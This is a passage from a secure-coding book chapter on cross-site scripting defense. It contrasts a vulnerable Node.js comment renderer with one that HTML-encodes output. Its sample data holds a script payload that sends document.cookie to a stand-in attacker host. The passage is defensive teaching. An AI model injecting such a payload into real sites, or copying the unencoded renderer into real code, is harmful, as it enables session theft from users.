
Chapter 4

Cross-Site Scripting Defense

Cross-site scripting, or “XSS,” is an attack in which untrusted data, typically attacker-supplied JavaScript, is delivered to a victim’s web browser as if it were part of a trusted site. Simply put, XSS is attacker-controlled code running within client browsers or other JavaScript engines. The attack is carried out by inserting malicious JavaScript, or fragments of it, into a host website’s pages; because the browser cannot tell the injected script apart from the site’s own, it executes it with the host site’s privileges whenever a victim views the page.
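To make the mechanism concrete, here is an added example that is not code from Iron-Clad Java: a stored-XSS shaped comment renderer written in Node.js, with the vulnerable string-concatenation version beside one that applies HTML element-content encoding before the untrusted data reaches the page. The comment data, the template, and all function names are constructed for this illustration; `encodeForHtml` is a hand-written stand-in for a contextual encoder such as `Encode.forHtml()` from the OWASP Java Encoder, and `foreignTags` is a crude substitute for the browser's parser that only reports start tags the template did not emit itself.

```javascript
// Added example (not from the book): vulnerable vs. output-encoded rendering
// of user comments. All data below is constructed for the demo.

// Constructed "comments" as they might sit in a database. The third entry is
// an attacker-supplied comment carrying a script payload.
const STORED_COMMENTS = [
  "Great article!",
  "I disagree with section 2, but well written.",
  '<script>fetch("https://attacker.example/steal?c=" + document.cookie)</script>',
];

// Vulnerable renderer: untrusted data is concatenated straight into HTML.
// The browser sees the attacker's <script> as part of the page and runs it.
function renderCommentsUnsafe(comments) {
  return "<ul>\n" + comments.map((c) => `  <li>${c}</li>`).join("\n") + "\n</ul>";
}

// Encoder for the HTML element-content context: the characters that can
// change the parser's state are replaced with entities. This mirrors what a
// contextual encoder does for the body context; it is NOT sufficient on its
// own for attribute, JavaScript, URL or CSS contexts, which need their own rules.
function encodeForHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened renderer: every untrusted value is encoded for the context it lands in.
function renderCommentsSafe(comments) {
  return "<ul>\n" + comments.map((c) => `  <li>${encodeForHtml(c)}</li>`).join("\n") + "\n</ul>";
}

// Crude stand-in for the browser's parser: list start tags in the rendered
// markup that the template itself does not produce. Anything reported here is
// markup the untrusted data managed to introduce.
function foreignTags(html, allowed = ["ul", "li"]) {
  const found = new Set();
  for (const m of html.matchAll(/<\s*([a-zA-Z][a-zA-Z0-9-]*)/g)) {
    const tag = m[1].toLowerCase();
    if (!allowed.includes(tag)) found.add(tag);
  }
  return [...found];
}

console.log("unsafe rendering introduces tags:", foreignTags(renderCommentsUnsafe(STORED_COMMENTS)));
console.log("safe rendering introduces tags:  ", foreignTags(renderCommentsSafe(STORED_COMMENTS)));
console.log(renderCommentsSafe(STORED_COMMENTS));
```

The important design point is that the fix is applied at the output boundary, where the data's destination context is known, rather than by trying to filter "bad" input on the way in: the same comment string may be safe in one context and dangerous in another, so the encoder must be chosen per context.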

XSS is one of the most common vulnerabilities found across the Web. In our personal experience, 80–90 percent of websites subjected to intensive penetration testing exhibited ...
